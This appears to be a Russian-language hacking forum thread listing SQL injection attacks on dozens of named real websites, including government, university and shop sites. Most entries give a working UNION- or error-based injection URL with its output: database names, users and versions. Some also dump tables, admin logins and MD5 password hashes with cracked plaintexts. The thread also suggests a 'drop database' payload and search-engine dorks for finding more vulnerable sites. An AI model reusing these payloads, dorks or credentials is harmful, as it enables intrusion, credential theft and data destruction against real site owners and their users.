http://www.ligai.com.ar/col.php?id=1/**/anD/**/1=8%20/**/uniON/**/aLl/**/seLECT/**/1,database(),version(),user(),1,1,1/*

user - ligai_usuario@localhost
database - ligai_db
version5.0.45-community


p-mart.net
http://www.p-mart.net/m/col.php?id=1/**/aNd/**/substring(version(),1,1)=3/*
ветка 3

http://old.dqlake.gov.cn/homepage/zwgk/zwgk_list.php?category=1+and+substring(@@version,1 ,1)=4

5ая ветка
http://imwerden.de/cat/modules.php?name=books&pa=last_update&cid=-1+union+select+1,column_name,3,4+from+information_ schema.columns+limit+80,1#
PR3

http://www.webmate.gr/siteadmin/forum/bb_profile.php?mode=view&user=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,concat_ws%280x3a,user_icq,user_password%29,17,18, 19,20,21,22,23,24,25,26+from+users+where+user_icq% 3E0+limit+0,1--

http://www.lomaseutu.fi/majapaikat3.php?id=-114+UNION SELECT 1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database (),version()),7,8,9,10,11,12,13,14,15
lomaseutufi@10.1.0.8 : lomaseutufi : 5.0.22-log

dealunion.com

Estimated number of visits for www.dealunion.com
5,383 visits per day

http://www.dealunion.com/hot.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17%23

Database Version: 5.0.81-community-log
Database name: dealunio_cat
User name: dealunio_niyteie@localhost

Database [dealunio_cat]
Table [article ( Rows)]
id
title
tlink
content
savetime
updatetime
effecttime
userid
menuid
classid
examined
saveflag
click
location
typeid
ihome
keyword
listprice
nowprice
fs
x
y
compare
nt
br
threadid
keyid
Table [banner ( Rows)]
id
logo1
logo2
logo3
typeid
Table [card_class ( Rows)]
id
name
sequence
ihome
homepage
Table [card_info ( Rows)]
id
title
texturl
imgurl
content
sequence
ihome
card_class_id
keyid
card_issuer_id
savetime
userid
aprlink
t1
t2
t3
t4
t5
t6
Table [card_issuer ( Rows)]
id
name
link
sequence
flag
Table [card_key ( Rows)]
id
name
sequence
Table [card_mid ( Rows)]
card_type_id
card_info_id
Table [card_type ( Rows)]
id
name
description
sequence
flag
Table [class ( Rows)]
id
name
description
tname
menuid
saveflag
savetime
sequence
Table [click_db ( Rows)]
articleid
flag
click
Table [cons ( Rows)]
id
kftitle
menuid
flag
effecttime
sequence
savetime
Table [dept ( Rows)]
id
name
phone
contact
description
sequence
Table [every ( Rows)]
id
userid
manageid
display
Table [favor ( Rows)]
userid
folder
Table [feedback ( Rows)]
id
topic
title
content
email
name
savetime
location
Table [function ( Rows)]
id
father
display
link
tname
pwide
attribute
sequence
Table [goodlink ( Rows)]
id
name
url
picture
sequence
typeid
linktypeid
piclink
Table [guestbook ( Rows)]
id
nickname
content
savetime
location
titleid
Table [images ( Rows)]
id
type
width
height
size
content
tname
pointer
savedate
sequence
Table [info ( Rows)]
id
offer
link
code
savetime
effecttime
typeid
ihome
userid
view
click
typename
Table [invite ( Rows)]
id
userid
firstname
lastname
email
savetime
Table [keywords ( Rows)]
id
title
flag
savetime
Table [linkexg ( Rows)]
id
kftitle
effecttime
sequence
flag
Table [linktype ( Rows)]
id
typename
description
sequence
Table [manage ( Rows)]
id
roleid
functionid
param
sequence
Table [menu ( Rows)]
id
father
child
display
url
grandpa
level
view
tname
description
sequence
Table [model ( Rows)]
id
folder
preview
Table [move ( Rows)]
id
typed
readme
flag
Table [newsletter ( Rows)]
id
email
fname
lname
flag
sendflag
Table [num ( Rows)]
id
n
Table [offers ( Rows)]
id
title
flag
typeid
exp
Table [popedom ( Rows)]
id
tname
pointer
wide
times
display
Table [pyeod ( Rows)]
id
testname
typecode
saveflag
Table [randp ( Rows)]
roleid
popedomid
Table [role ( Rows)]
id
deptid
name
savetime
view
description
sequence
Table [tablename ( Rows)]
id
tname
display
Table [titlekeys ( Rows)]
id
name
Table [top10 ( Rows)]
id
content
saveflag
typeid
compare
savetime
effecttime
Table [type ( Rows)]
id
name
sequence
ihome
homepage
logo
click
Table [users ( Rows)]
id
name
password
examined
savetime
truename
sex
phone
address
email
proffesion
roleid
deptid
duty
sequence


http://www.dealunion.com/hot.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,id,name,password,e xamined,savetime,truename,sex,phone,address,email, proffesion,roleid,deptid,duty,sequence),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17+from+users%23

1:tairh:9cecd11561f7c30b77a4637359e5d663:1:2002-02-28 00:00:00:system:0::::soft design:1:0:��վ��������Ա:1
3:zdy:e10adc3949ba59abbe56e057f20f883e:1:2006-07-25 23:44:14:1:6:5:3
4:dhm:e10adc3949ba59abbe56e057f20f883e:1:2006-07-25 23:44:58:0:6:5:4
5:fsp:85964989611934e09fd33690cd7aa279:1:2006-07-25 23:45:39:0:7:7:5
6:wd:96e79218965eb72c92a549dd5a330112:1:2006-07-25 23:46:09:1:6:7:6
7:chz:e10adc3949ba59abbe56e057f20f883e:1:2007-03-05 20:35:28:1:6:5:7
8:lcx:21218cca77804d2ba1922c33e0151105:1:2008-04-05 00:32:35:1:6:5:8
9:lxl:308e5380dd8f3119b02e54b2ef21327c:1:2009-02-27 09:17:29:1:7:7:9
10:ldy:670b14728ad9902aecba32e22fa4f6bd:1:2009-04-16 12:50:14:0:6:5:10

хэш MD5:9cecd11561f7c30b77a4637359e5d663:пароль_ не_найден, хеш уже есть в очереди
хэш MD5:e10adc3949ba59abbe56e057f20f883e:123456
хэш MD5:e10adc3949ba59abbe56e057f20f883e:123456
хэш MD5:85964989611934e09fd33690cd7aa279:beyond
хэш MD5:96e79218965eb72c92a549dd5a330112:111111
хэш MD5:e10adc3949ba59abbe56e057f20f883e:123456
хэш MD5:21218cca77804d2ba1922c33e0151105:888888
хэш MD5:308e5380dd8f3119b02e54b2ef21327c:пароль_ не_найден, хеш уже есть в очереди
хэш MD5:670b14728ad9902aecba32e22fa4f6bd:000000

http://www.globa.ru/School.asp?ID_Sel=1'


Добрался до

http://www.globa.ru/School.asp?ID_Sel=1+or+1=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= 'fond'+AND+COLUMN_NAME+NOT+IN+('id','rus_name','en g_name','realname','b_loc_date','b_loc_time','b_gm t_date','b_gmt_time','bplace','b_long_min','b_long side','b_long_sec','b_lati_min','b_latiside','b_la ti_sec','b_suns','b_moon','b_week','b_ages','s_fad e_date','s_fade_time','l_fade_date','l_fade_time', 'd_date','d_time','dplace','d_info','d_take','d_ag es','rate','marriage','children','marrinfo','detai l','photoa','photob','natalmap','planet','placid', 'star','others','body','show','vpos','makedate','z orototems','zorocolors','chinyear','chincolors'))--

Потом забил ))


Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.ardiatech.com/main.asp?id_sel=1&cat=news&sCat=news_content&sel_nav1=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INF ORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='q_regist rants'+AND+COLUMN_NAME+NOT+IN+('reg_id','name','ad dress','tel','email','took_a_shot','successful','d ate_inserted'))--


Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.toptrucks.cz/ext/detail.php?PHPSESSID=j5h2rm84vp3g3re3tmbg6fqdq4&advert_key=1+and+1=cast((select+version())||chr(58 )||user+as+Int)

PostgreSQL 8.1.11 on i686-pc-linux-gnu, compiled by GCC 2.96:sys_anon

Администрация Ростовской Области

http://www.donland.ru/content/info.asp?partId=5&infoId=1+or+1=@@version--

Microsoft SQL Server 2008 (SP1) - 10.0.2723.0 (Intel X86) Jul 10 2009 01:41:08 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)

http://www.travellingtight.com/journal.php?id=3/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/LIMIT/**/1,1

Database Version: 5.0.27-Debian_0.dotdeb.1
Database name: travellingtight_main
User name: travellingtight_us3r@localhost

http://www.sciencesmath-paris.math.jussieu.fr/index.php?page=-16'+union+select+1,2,concat_ws(0x3a,ID_USER,LOGIN_ USER,PASS_USER,NOM_USER,PRENOM_USER,GENRE_USER,MAI L_USER,LVL_USER)+from+FOND_USER+limit+3,1+/*+&lien=14&lang=fr

http://www.sgieurope.com/index.php?RubID=24+union+select+1,2,concat_ws(0x3a 3a,UserLogin,UserPassword),4,5,6,7,8,9,10+from+use r+--+

http://www.fhp.fr/index.php?ID=&LangueID=1&ThemeID=-1+union+select+1,2,3,4,5,6,7,8+from+user+--+&RubID=1

http://surlinjobs.com/showjob.php?jobcode=-2604+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,concat_ws(0x3a3a,id,username,pa ssword),22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 +from+admin+limit+6,1+--+

Gis-t.org pr5
The American Association of State Highway and Transportation Officials sponsors the annual GIS for Transportation Symposium.
http://www.gis-t.org/poster.php?year=2008+and+substring(version(),1,1)= 5+--+mysql version: 5.0.81-community
mysql user: gistorg_db@localhost

fitness.yantra.su -
http://fitness.yantra.su/next.php?id=1/**/anD/**/1=8%20/**/unION/**/seLEcT/**/1,version(),3/*
version - 4.1.22-log
user - yantra_admin@10.1.113.107
database - yantra_main

http://www.theglasgowcollective.com/artists/detail/index.php?id=-1+UNION+SELECT+database(),version()
version - 5.0.45-log
user - theglasgow1@213.171.218.137
database - theglasgow1

www.psychodelart.com
ТИЦ:20
http://www.psychodelart.com/projects.php?ptype=-4+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9/*
Version():4.0.27-max-log
Database():geokon10_db01
User():geokon10_db01@v41.valuehost.ru

www.geokongroup.com
ТИЦ:20
PR:4
http://www.geokongroup.com/shownews.php?news=-42+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7
Version():4.0.27-max-log
Database():geokon10
User():geokon10@v41.valuehost.ru

http://www.sacredpassage.com/schedule/index.php?id=-1+UNION+SELECT+1,user%28%29,3,4
version - 4.1.22-standard-log
user - sacredpa_sacred1@localhost
database - sacredpa_sacredpa

http://www.sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version--



Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://livefrogsupyourarse.com/index.php?cat=php&item=1+UNION+SELECT+1,2,version(),4,5,6,7,8+LIMIT+ 1,1

Database Version: 5.0.81-community
Database name: livefrog_frosk
User name: livefrog_loon@localhost

http://www.obs.org/page.php?ITEM=26+UNION+SELECT+1,2,3,4,5,6,7,8,9+FR OM+users+LIMIT+1,1

Database Version: 4.0.27-max-log
Database name: db136428592
User name: dbo136428592@74.208.16.121


http://www.greenmagazine.com.au/news.php?aid=257+UNION+SELECT+1+FROM+LIMIT+1,1

Database Version: 4.1.22-standard-log
Database name: gre32382_greenmagazine
User name: gre32382@localhost

http://www.fyne.co.uk/index.php?item=-163+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,concat_ws(0x3a,user(),database(),versi on()),20,21,22,23,24,25,26,27,28,29,30,31,32+--+
User: dbo166299381@212.227.118.54
Database: db166299381
Version: 4.0.27-max-log

http://www.emediaworld.com/press_release/release_detail.php?id=-87007+union+select+1,2,3,4,5,6,7,8,9,10,version(), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- пятрека

4.0.27-standard
http://www.sphinxcomputer.de/html/news.php?id=-657+union+select+1,2,3,version(),5,6--


5.0.51a-3-log
http://www.kami-stylez.de/news.php?id=-83+union+select+1,2,3,version(),5,6,7,8,9,10--

http://www.lymediseaseassociation.org/referral/Petitions/Petition.php?id=-1'+union+select+1,2,version()+--+


5 ветка

http://www.sts.cornell.edu/viewprofile.php?ProfileID=-1+union+select+1,userid,0x3c3c3c3,unhex(hex(passwo rd)),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+use rs+limit+1,1%20--
PR6

http://score.dnr.sc.gov/deep.php?subject=2&topic=1+union+select+1,concat(0x2a,version(),user( ),database()),3,4,5+limit+1,1/*

4.1.20 score@localhostscore

Какойто онлаин магазин)))

http://www.avtax.ru/?info=3+union+select+1,concat_ws(user(),0x3a,versi on(),0x3a,database()),3,4,5/*&subinfo=9

А вот и прикол! вывод результата

# Кто мы?

# :avtax2@localhost.localdomain5.0.24-standardavtax2@localhost.localdomain:avtax2@localh ost.localdomaindb_avtax2


Далее

http://www.avtax.ru/?info=3+union+select+1,table_name,3,4,5+from+infor mation_schema.tables/*&subinfo=9


# Кто мы?

# CHARACTER_SETS

# COLLATIONS

# COLLATION_CHARACTER_SET_APPLICABILITY

# COLUMNS

# COLUMN_PRIVILEGES

# KEY_COLUMN_USAGE

# ROUTINES

# SCHEMATA

# SCHEMA_PRIVILEGES

# STATISTICS

# TABLES

# TABLE_CONSTRAINTS

# TABLE_PRIVILEGES

# TRIGGERS

# USER_PRIVILEGES

# VIEWS

# tabCategories

# tabInfo

# tabMainInfo

# tabModels

# tabSex

# tabSubTovars

# tabTovars

# tabTovars_copy



Далее думаю ясно всем будет))))

Также можно выполнить ;)

http://www.avtax.ru/?info=3+drop+database+db_avtax2/*&subinfo=9

Но я не стал этого делать... :D

http://www.soltis-toiles.com/cat.php?p=11+UNION+SELECT+1,version(),3,4,5,6,7,8, 9+LIMIT+1,1

Database name: soltis-stores
User name: soltis-stores@localhost
Database name: soltis-stores

http://www.firestone-duncan.com/print.php?topic=Services&cid=-1+union+select+1,2,'xekme',4,5,6+from+mysql.user--+

http://www.omatmerkit.inex.fi/default.asp?viewID=1474&productID=@@version

MsSQL
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

http://www.techiwarehouse.com/cms/articles.php?cat=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16+--+

http://www.topi-top.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+f rom+admin--


http://www.modeli.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+f rom+admin--

4.1.22
http://freshfiction.com/page.php?id=-2029+union+select+1,2,3,4,version(),6,7,8,9,10--

pr5
http://www.cc-bassin-annonay.fr/communes/clubasso/consulterclubasso.php3?num=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+users+/*+&css=2

pr5
http://www.latina.fr/index.php?id=3&art=-345+union+select+1,2,concat_ws(0x3a3a,pseudo,mdp,a dmin),4,5,6+from+users+--+

http://www.adofm.fr/index.php?id=65&art=943&idcat=-16+union+select+1,2,unhex(hex(concat_ws(0x3a3a,pse udo,mdp,admin))),4,5,6,7+from+users+--+&idvid=168

http://endirect.univ-fcomte.fr/index.php?id=numero_98_13_1&art=-1079'+union+select+1,group_concat(table_name),3,4, 5,6,7,8,9+from+information_schema.tables+/*+

http://www.technique-voile.com/actualites_voile/index.php?ID=-233'+UniOn+sElEct+1,2,3,4,5,6,7,8,9,10,11+from+adm in+--+

http://www.xatrik.ru/katalog/catalog.php?id=-1+union+select+1,user%28%29,3,4,5,6,7--
xatrikr0_t@localhost
4.1.25

http://www.international-alert.org/press/archive.php?id=-243+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24--

5.0.27:internationorg_all:cmr@localhost

-------
Tables

http://www.international-alert.org/press/archive.php?id=-243+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24+from+INFORM ATION_SCHEMA.TABLES--

-------------------------
http://www.webc-budapest.com/content/news_id.php?lang=en&id=-92+union+select+1,2,3,version(),5--

user() - lh288200@localhost
version() - 4.0.27
database() - lh288200db

http://eupodo.de/category.php?IndustryID=169+union+select+1,2,conca t_ws(0x3a,loginid,password)+from+admin--


5.0.32-Debian_7etch8-log
eupodosql
eupodosql1@localhost
http://eupodo.de/category.php?IndustryID=169+union+select+1,2,user% 28%29+from+admin--

http://www.ccrl.ca/print.php?id=-5061+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29

Найден уязвимый движок сайт (CMS)

Находиться по запросу в гугле:
category.php?IndustryID=

Найденный мною сайт:

http://worldb2b.org/category.php?IndustryID=-14+union+select+1,2,concat_ws(0x3a,LoginID,Passwor d,AdminEmail,AdminEmailPassword,smtp,ScriptName,ur l,smtpstatus,port,Title,nochex,twoco,paypal,goldme mberfee)+from+admin--

http://justclone.com/alibabaclone/category.php?IndustryID=-31+union+select+1,2,group_concat(column_name)+from +information_schema.columns+where+table_name=0x616 46d696e--

Дальше разберетесь думаю

-------------------
http://www.fashionsnightout.com/storelisting.php?id=-707+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18--
--
version() - 5.0.51A
user() - VOGUE_FASHION@LOCALHOST
database() - VOGUE_FASHION
--
Таблицы

http://www.fashionsnightout.com/storelisting.php?id=-707+union+select+1,2,3,4,5,6,7,8,9,10,11,TABLE_NAM E,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES--
-------------------
http://vesti.az/category.php?id=-12+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11,12,13--
--
version() - 5.0.81-community
user() - vestiaz@localhost
database() - vestiaz_novost
--

5.0.32-Debian_7etch3~bpo31+1-log
http://www.taiwanb2b.com/category.php?IndustryID=34+union+select+1,2,concat _ws%280x3a,loginid,password%29+from+admin--

http://www.steinbeis-europa.de/index.php5?id=-409+unIon+seleCt+1,concat_ws(0x3a,user(),version() ,database())+--+&file=192
User: root@www.steinbeis-europa.de
Version: 5.0.32-Debian_7etch8-log
Database: sez

4.1.22 log
http://www.freemp3.org.ua/news.php?id=-139+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13,14,15--

Pavlodar.gov.kz pr4 тИЦ=200
Аппарат акима Павлодарской области
http://www.pavlodar.gov.kz/page.php?page_id=1000+and+substring(version(),1,1) =5version: 5.1.22-rc-log
user: db_pavlo@localhost

ps/ родной город великого webkill'a?)

Парашютисты
http://www.skydiver.com.ua/publication/index.php?cat_id=-3%20union%20select%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,%2030%20--

skydiver@localhost: skydiver: 4.0.27-log

http://www.ksk1.com.ua/news.php?id=-1+union+select+1,2,3,4--

Database Version: 4.1.22-standard-log
Database name: ksk1com_db
User name: ksk1com_db@localhost

http://www.sgg.go.gov.br/agenda_21.php?idMateria=1+and+1=cast((select+versi on())||chr(58)||user+as+int)

PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:sgg

Магазин одежды 5-я ветка

http://www.svitstyle.com.ua/index.php?page=-14%20union%20select%201,2,3,concat_ws%28char%2858% 29,login,psw%29,5,6%20FROM%20guest%20limit%201,1
http://www.svitstyle.com.ua/index.php?page=-14%20union%20select%201,2,3,concat_ws%28char%2858% 29,uname,upass%29,5,6%20FROM%20users%20limit%201,1
Разные таблы.

Новости Днепропетровска и Украины 5-я ветка
http://www.prodnepr.dp.ua/news.php3?action=details&news_id=-1335%20union%20select%201,2,login,4,passw+FROM%20j ob_catvip

http://www.swftools.com/
http://www.swftools.com/tools-category.php?cat=-289'+union+select+1,group_concat(table_name,0x3a,t able_schema),3,4,5,6,7,8+from+information_schema.c olumns+where+column_name+like+'%pas%'--+


http://www.naturistproperty.com/
http://www.naturistproperty.com/index.php?ac=details&id=86+union+select+1,2,3,4,5,6,concat_ws(0x3a,admi n_id,first_name,last_name,email,password),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29+from+admin--+

http://www.naturistproperty.com/admin

EDU
PR7
http://www.cogsci.ucsd.edu/cmp-general-data-display.php?display=true&what=perspective&id=119+and+1=0+union+select+1,2,3,4,concat_ws(0x3a ,version(),user(),database(),@@version_compile_os) ,6,7,8,9,10+--+-
Database version:5.0.77
Database user: admin@localhost
Database name: cogsci
OS version:redhat-linux-gnu

Вот ОПЯТЬ нашел уязвимый скрипт CMS сайта или галерея картинок что то типо того.

Название CMS: All text and images © copyright Delta Patchwork LLC или что то типо того

Расположение сайтов: https://208.186.168.218:19638/siteadmin/?ocw_login_domain=
все эти уязвимые двиги расположенны на этом серевер!

Находить их можно по запросу в гугле:

Site designed and hosted by GloDerWorks
или

All text and images © copyright Delta Patchwork LLC

4.1.22-log
http://www.tayport.org.uk/photo.php?id=-329+union+select+1,2,3,version(),5--

4.0.27-max-log
http://www.contrastproject.org/photo.php?id=-92+union+select+1,2,3,version(),5,6,7,8,9--

5.0.67
http://www.team-parkinson.org/photo.php?ID=-69+union+select+1,2,3,4,5,6,version(),8,9,10,11--


5.0.45
http://dublin.anglican.org/photo.php?id=-753+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13--

Если Вы хотите похекать все сайты без проблем (тоесть поиска)

Прошу посетить сайт дизайнеров этой кмс, там они выложили всех своих клиентов!

Сайты америки:
http://www.gloderworks.com/USA-portfolio.php

Сайты королевства:
http://www.gloderworks.com/UK-portfolio.php

А да и еще сам сайт дизайнеров тоже уязвим...

ОТ плюсегов неоткажусь

http://www.saratov.ru/gallery/?show=gal&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase())+--+
User - gallery@localhost
Version - 4.0.17
Database - saratov

cwas.hinah.com
http://cwas.hinah.com/interview/?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9+--
user-hinah@192.168.3.152
db-hinah
version-4.0.18-log

'(

ventomir.ru - TC=20
http://www.ventomir.ru/next.php?id=1/**/anD/**/1=2%20/**/uniON/**/seLECT/**/unhex(hex(version()))/*
version - 5.0.32-Debian_7etch8
user - ventomirru@localhost
database - ventomirru

Cnjx.gov.cn pr5
Сайт китайского округа Цзиси. Я так понял )
http://www.cnjx.gov.cn/vod/vod_view.php?id=null+union+select+null,null,concat _ws(char(32,124,32),version(),user(),database()),n ull,null,null,null,null,null,null,null,null,null,n ull,null+--+4.0.26-nt | webuser@localhost | web_db

http://www.pouillysurloire.fr/index.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,g roup_concat(table_name),16+from+information_schema .tables+/*+&lang=fr&p=4

http://www.cap-dail.fr/index.php?id=6795&idn=-4118+union+select+1,login,pass,4,5,6+from+cms_admi n+limit+0,1+/*+

http://www.theoule-sur-mer.org/index.php?id=7211&idag=-2148+union+select+1,2,concat_ws(0x3a3a,login,pass) ,4,5,6+from+cms_admin+limit+1,1+/*+

http://www.lebarsurloup.fr/index.php?id=1020&idn=-4336+union+select+1,login,pass,4,5,6+from+cms_admi n+/*+

http://www.ville-la-turbie.fr/index.php?id=4906&idn=-2470+union+select+1,concat_ws(0x3a3a,login,pass),3 ,4,5,6+from+cms_admin+/*+

админку так и не нашёл((

http://www.spiritualitea.com/index.php?option=com_userlist&Itemid=77
в поиске:
-1') union select 1,concat_ws(0x3a,version(),database(),user()),3,4, 5,6,7,8 -- 1

Dating, MS Access
_http://www.freedatingusa.com/uk/index.asp?action=sites&link=-1+OR+1=2

http://www.rabota-v-chelyabinske.ru/view_vac.php?id=-11050+UNION+SELECT+1,2,3,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20

Version:5.0.26-log
Database:chelsiru_job
User:chelsiru_job@localhost
Os: pc-linux-gnu

http://www.medikas.info/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password,us er(),version())+from+admin--

_http://www.it-recycling.dk/shownews.php?id=804353543534+union+select+1,2,3,co ncat_ws%280x3a,username,hashed_password%29+from+us ers+limit+0,1


_http://www.rauschpromotion.de/shownews.php?id=79646+union+select+1,2,3,4,table_n ame,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24+from+information_schema.tables+limit+22,1

sexicq.ru
http://sexicq.ru/payment.php?id=4'
слепая скуля, 5 версия
таблы
0=chatmessage
1=chatsession
2=client
3=girl
4=operation
5=partner
6=payment
7=paymentstatus
8=role
9=roleoperation
10=smspayment
11=user (userID,fullname,position,login,passw,contactInfo, notes,insider)
12=userrole
13=weblink
14=webnews
15=webtopic
-------------

http://www.acube-systems.biz/index.php?page=news&id=-1+union+select+1,2,3,4,5+
пр 4 ветка 4

http://www.peterchalkco.co.uk/index.php?Id=-8+union+select+1,2,3,concat_Ws(0x3a3a,adminUsernam e,adminPassword),5,6,7+from+tabFoamAdmin+limit+1,1 +--+

http://www.sfha.co.uk/index.php?pg=5&id=-578+union+select+1,2,concat_ws(0x3a3a,user_name,pa ssword,administrator),4,5,6,7,8,9,10,11,12+from+us ers+/*+

http://www.ukweddingdresscleaners.co.uk/index.php?Id=-8+union+select+1,2,concat_Ws(0x3a3a,Id,adminUserna me,adminPassword),4,5,6,7+from+tabAdmin+--+

http://www.lotusnotesdomino.de/pageContent.php?prdid=39&subpage=-149+union+select+1,2,3,4,5,6,group_concat(table_na me),8+from+information_schema.tables+/*+&pg=6'

http://www.bestbowlers.info/shownews.php?id=-20+union+select+1,2,3+from+admin+/*+

http://troyleedesigns.com/company/news/article.php?news_id=-1+union+select+1,user_name,3,password,5,6,7,8,9,10 ,11,12,13+from+user--

odessa.co.ua ---
http://www.odessa.co.ua/houses/?p=view&num=900%20and%201=2%20union%20all%20select%201,2,v ersion(),4,5,6,7,8,9,0,1/*
version - 4.1.22-standard-log
user - odessac_main@localhost
database - odessac_odessa

EDU PR 5

http://www.continuinged.ku.edu/aero/course.php?aid=-7+union+select+1,2,3,4,5,6,7,8,9/*

Database Version: 5.0.45
Database name: aerocourses
User name: webber@localhost

EDU 7!

http://www.polytechnique.edu/interview.php?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

Database Version: 5.0.86
Database name: contenu
User name: edu@localhost

_http://www.andhrastudio.com/studio.php?id=-2009+union+select+1,version(),3,4,5,6--

_http://ghbarratt.com/studio/php/artwork.php?id=-22+union+select+1,version(),3,4,5,6--

http://www.imca.com/raceresults.php?id=-50+union+select+1,2,version(),4/*

Database Version: 4.1.22-standard
Database name: imca_main
User name: imca_dba@localhost

PR 6

http://www.ikisahil.com/content/index.php?link=news_id.php&category=medeniyyet&id=-4734+UNION+SELECT+1,2,3,4,5,6

Database Version: 4.1.25
Database name: ikisahil_ikisahil
User name: ikisahil_ikisahi@localhost

http://sistermarybuttface.com/users.php?id=-121+union+select+version()--

http://www.baltichouse.spb.ru/index.php?language_id=1&section_id=-57+union+select+concat_ws(0x3a,user(),database(),v ersion())baltcspb@localhost:baltcspb:4.1.20-lk-log

http://www.nccu.edu.tw/news/detail.php?news_id=1+and+substring(@@version,1,1)= 5

star-modelgroup.com --- TIC=30
http://www.star-modelgroup.com/index.php?PageID=27&LangID=0+anD+1=2+union+all+select+1,2,3,4,version( ),6,7/*
version - 4.1.22-standard-log
user - starmod_usr@localhost
database - starmod_mgf
os - unknown-linux-gnu

Интернет-магазин снаряжения для подводного плавания и подводной охоты
http://plavniki.com.ua/products.php?act=prod&pid=-1618%20union%20select%20login%20from%20admins--
4-я ветка
зы: вывод в самом вверху,слева

Детский магазинчик
http://www.baby-market.com.ua/catalog.php?id_cat=-21%20union%20select%201,2,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,4,5,6%20%20--
4.0.27-log:user_babymarket:babymarket@localhost
ТИЦ: 70

Дом кожи
http://domko.com.ua/index.php?id=194&show=-259%20union%20select%201,2,3,concat_ws%280x3a,vers ion%28%29,database%28%29,user%28%29%29,5,6%20--

5.0.51a-24-log:firstline_base:firstline_base@localhost
ТИЦ: 10
PR: 1

Ещё магазинчик
http://agent.dp.ua/catalog.php?id=7&sub_id=6%20union%20select%201,2,3,4,5,concat_ws%28 0x3a,version%28%29,database%28%29,user%28%29%29,7, 8,9,10,11--
4.1.22-log:agent:agent@localhost
ТИЦ: 10
PR: 2

Магазин детских товаров
http://pingvi.com.ua/index.php?cat=-6%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,concat_ws%280x3a,version%28%29,databa se%28%29,user%28%29%29,19,20,21,22,23%20--
5.0.75-log:pingvi:pingvi@localhost
и вот ещё нарыл, может кому то понадобиться
http://pingvi.com.ua/templates/vamshop/
http://pingvi.com.ua/templates/vamshop_table/
http://pingvi.com.ua/templates/

Магазин швейных машин
http://saleshop.com.ua/index.php?idShopTovar=-25%20union%20select%201,concat_ws%280x3a,version%2 8%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21%20--
5.0.51a:shopsale2:shopsale2@localhost

spring08787@localhost:spring:5.0.51
http://www.springscream.com/doc.php?id=-29+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7,8,9,10--


user_pbg@localhost:db_pbg:5.0.62
